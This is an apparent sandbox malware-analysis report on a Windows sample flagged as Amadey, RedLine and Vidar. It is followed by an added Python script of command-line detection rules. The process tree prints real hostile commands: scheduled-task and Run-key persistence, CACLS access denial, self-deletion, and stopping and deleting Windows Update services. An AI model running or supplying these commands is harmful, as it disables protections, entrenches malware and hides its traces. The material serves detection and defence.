Windows
Analysis Report
DQxttu2Qrr.exe
Overview
General Information
Detection
Amadey, Laplas Clipper, RedLine, SystemBC, Vidar
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Yara detected Laplas Clipper
System process connects to network (likely due to code injection or exploit)
Yara detected SystemBC
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Creates multiple autostart registry keys
Query firmware table information (likely to detect VMs)
Uses cmd line tools excessively to alter registry or file data
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect debuggers (CloseHandle check)
Allocates memory in foreign processes
Injects a PE file into a foreign process
Tries to evade analysis by executing a special instruction (VM detection)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Uses powercfg.exe to modify the power settings
Hides threads from debuggers
Modifies power options to not sleep / hibernate
Overwrites code with function prologues
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Self deletion via cmd or bat file
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Modifies the hosts file
Yara detected Generic Downloader
Found hidden mapped module (file has been removed from disk)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to steal Instant Messenger accounts or passwords
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Checks if the current process is being debugged
Uses reg.exe to modify the Windows registry
PE file contains more sections than normal
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
PE file contains an invalid checksum
Uses cacls to modify the permissions of files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
PE / OLE file has an invalid certificate
Classification
- System is w10x64
- DQxttu2Qrr.exe (PID: 2508 cmdline: C:\Users\user\Desktop\DQxttu2Qrr.exe MD5: 7434B42E11380272961C92E061072E78)
- 61312899942613011832.exe (PID: 5372 cmdline: "C:\ProgramData\61312899942613011832.exe" MD5: 2239A58CC93FD94DC2806CE7F6AF0A0B)
- gntuud.exe (PID: 5780 cmdline: "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" MD5: 2239A58CC93FD94DC2806CE7F6AF0A0B)
- schtasks.exe (PID: 5908 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 5920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 5928 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 5996 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
- cacls.exe (PID: 6004 cmdline: CACLS "gntuud.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
- cacls.exe (PID: 6024 cmdline: CACLS "gntuud.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
- cmd.exe (PID: 6064 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
- cacls.exe (PID: 6076 cmdline: CACLS "..\03bd543fce" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
- cacls.exe (PID: 6096 cmdline: CACLS "..\03bd543fce" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
- rundll32.exe (PID: 6128 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- Emit64.exe (PID: 3920 cmdline: "C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe" MD5: 7A5155B804E592D83F8319CBDB27E164)
- powershell.exe (PID: 3044 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qgoyddbo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'RtkAudUService64.exe' /tr '''C:\Users\user\Locktime\RtkAudUService64.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Locktime\RtkAudUService64.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'RtkAudUService64.exe' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "RtkAudUService64.exe" /t REG_SZ /f /d 'C:\Users\user\Locktime\RtkAudUService64.exe' } MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 5248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- avicapn32.exe (PID: 1112 cmdline: "C:\Users\user\1000018002\avicapn32.exe" MD5: 0F6EF96C5E687631EF27F1DCD1AFE7B4)
- rundll32.exe (PID: 2820 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\1000019012\syncfiles.dll, rundll MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- umciavi64.exe (PID: 68 cmdline: "C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe" MD5: 8F727EA574C46E3FD8901335A6548285)
- cmd.exe (PID: 5596 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 5604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- timeout.exe (PID: 5636 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
- gntuud.exe (PID: 4948 cmdline: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe MD5: 2239A58CC93FD94DC2806CE7F6AF0A0B)
- cmd.exe (PID: 1500 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 3076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- sc.exe (PID: 5040 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)
- sc.exe (PID: 3400 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)
- sc.exe (PID: 4616 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)
- sc.exe (PID: 5488 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)
- sc.exe (PID: 5224 cmdline: sc stop dosvc MD5: D79784553A9410D15E04766AAAB77CD6)
- reg.exe (PID: 5848 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)
- reg.exe (PID: 5772 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)
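The process tree above packs several detectable behaviours into plain command lines: a scheduled task that re-launches gntuud.exe from Temp every minute, CACLS denying the owning user access to the dropped file and its folder, a timeout-then-del self-deletion of the original sample, sc stop / reg delete against the Windows Update service set (UsoSvc, WaaSMedicSvc, wuauserv, bits, dosvc), an HKCU Run key written from PowerShell, and rundll32 loading a DLL from the user profile by export name. The script below is an added example and not part of the Joe Sandbox report: it encodes each of those behaviours as a rule over a process command line and runs them against lines constructed from the cmdline fields in the tree. The rule names, regexes and the list of update-related services are the editor's own choices, not fields from the report.

```python
"""Command-line triage rules for the behaviours shown in the process tree.

Added example, not part of the Joe Sandbox report. Each rule encodes one
behaviour visible in the report's cmdline fields; SAMPLE_CMDLINES is
constructed from those fields so the script runs offline.
"""
import re
from collections import Counter

# Constructed from the report's process tree (paths are the report's). The
# CACLS ... /P "user:R" /E line and the conhost line are benign controls.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe '
    r'/TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F',
    r'CACLS "gntuud.exe" /P "user:N"',
    r'CACLS "gntuud.exe" /P "user:R" /E',
    r'"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q '
    r'"C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit',
    r'sc stop WaaSMedicSvc',
    r'reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f',
    r'reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "RtkAudUService64.exe" '
    r"/t REG_SZ /f /d 'C:\Users\user\Locktime\RtkAudUService64.exe'",
    r'"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main',
    r'C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
]

# Services the report's cmd.exe child stops and deletes. This set is the
# editor's assumption of what counts as "update tampering", not a report field.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}


def _user_writable(path: str) -> bool:
    """True for locations an unprivileged user can write to (profile, ProgramData, Temp)."""
    return re.search(r'\\users\\[^\\]+\\|\\programdata\\|\\temp\\', path, re.I) is not None


def rule_scheduled_task_user_path(c: str) -> bool:
    """schtasks /create or Register-ScheduledTask whose action lives in a user-writable path."""
    m = (re.search(r'\bschtasks(?:\.exe)?"?\s+/create\b.*?/tr\s+"?([^"]+?)"?(?:\s+/|$)', c, re.I)
         or re.search(r"New-ScheduledTaskAction\s+-Execute\s+'([^']+)'", c, re.I))
    return bool(m and _user_writable(m.group(1)))


def rule_acl_lockdown(c: str) -> bool:
    """cacls/icacls denying a principal access (the report's /P "user:N"); /P "user:R" /E alone is not flagged."""
    return re.search(r'\bi?cacls(?:\.exe)?"?\s+.*?(?:/[pdg]\s+"?[^"\s]+:n\b|/deny\b)', c, re.I) is not None


def rule_self_delete(c: str) -> bool:
    """A delay (timeout/ping) chained with del of an .exe: the report's timeout /t 6 & del /f /q pattern."""
    return re.search(r'\b(?:timeout|ping)\b[^&]*&+\s*del\s+(?:/\w\s+)*"?[^"&]+\.exe\b', c, re.I) is not None


def rule_update_service_tamper(c: str) -> bool:
    """sc stop/delete/config or reg delete of a Services key for an update-related service."""
    names = re.findall(r'\bsc(?:\.exe)?\s+(?:stop|delete|config)\s+(\w+)', c, re.I)
    names += re.findall(r'\breg(?:\.exe)?\s+delete\s+"?HKLM\\SYSTEM\\CurrentControlSet\\Services\\(\w+)', c, re.I)
    return any(n.lower() in UPDATE_SERVICES for n in names)


def rule_run_key_persistence(c: str) -> bool:
    """reg add or *-ItemProperty writing under ...\\CurrentVersion\\Run or RunOnce."""
    return re.search(r'\b(?:reg(?:\.exe)?\s+add|(?:Set|New)-ItemProperty)\b.*?\\CurrentVersion\\Run(?:Once)?\b',
                     c, re.I) is not None


def rule_rundll32_user_dll(c: str) -> bool:
    """rundll32 invoking an export from a DLL stored in a user-writable path."""
    m = re.search(r'\brundll32(?:\.exe)?"?\s+"?([^",]+\.dll)\s*,\s*\w+', c, re.I)
    return bool(m and _user_writable(m.group(1)))


RULES = [
    ("scheduled_task_user_path", rule_scheduled_task_user_path),
    ("acl_lockdown", rule_acl_lockdown),
    ("self_delete", rule_self_delete),
    ("update_service_tamper", rule_update_service_tamper),
    ("run_key_persistence", rule_run_key_persistence),
    ("rundll32_user_dll", rule_rundll32_user_dll),
]


def classify(cmdline: str) -> list:
    """Names of every rule the command line triggers, in RULES order."""
    return [name for name, rule in RULES if rule(cmdline)]


def triage(cmdlines) -> Counter:
    """Per-rule hit counts across a batch of command lines."""
    hits = Counter()
    for c in cmdlines:
        hits.update(classify(c))
    return hits


if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(f"{','.join(classify(c)) or '-':<28} {c[:80]}")
    print(dict(triage(SAMPLE_CMDLINES)))
```

The rules are deliberately narrow: the CACLS line granting user:R with /E is the second half of the malware's own lock/unlock dance and is not by itself suspicious, so only the deny (:N) form is flagged, and the service rule fires only for names in UPDATE_SERVICES rather than on any sc stop. Feed the function process-creation events (Sysmon Event ID 1 or 4688 with command-line auditing) to reproduce the same tagging outside the sandbox.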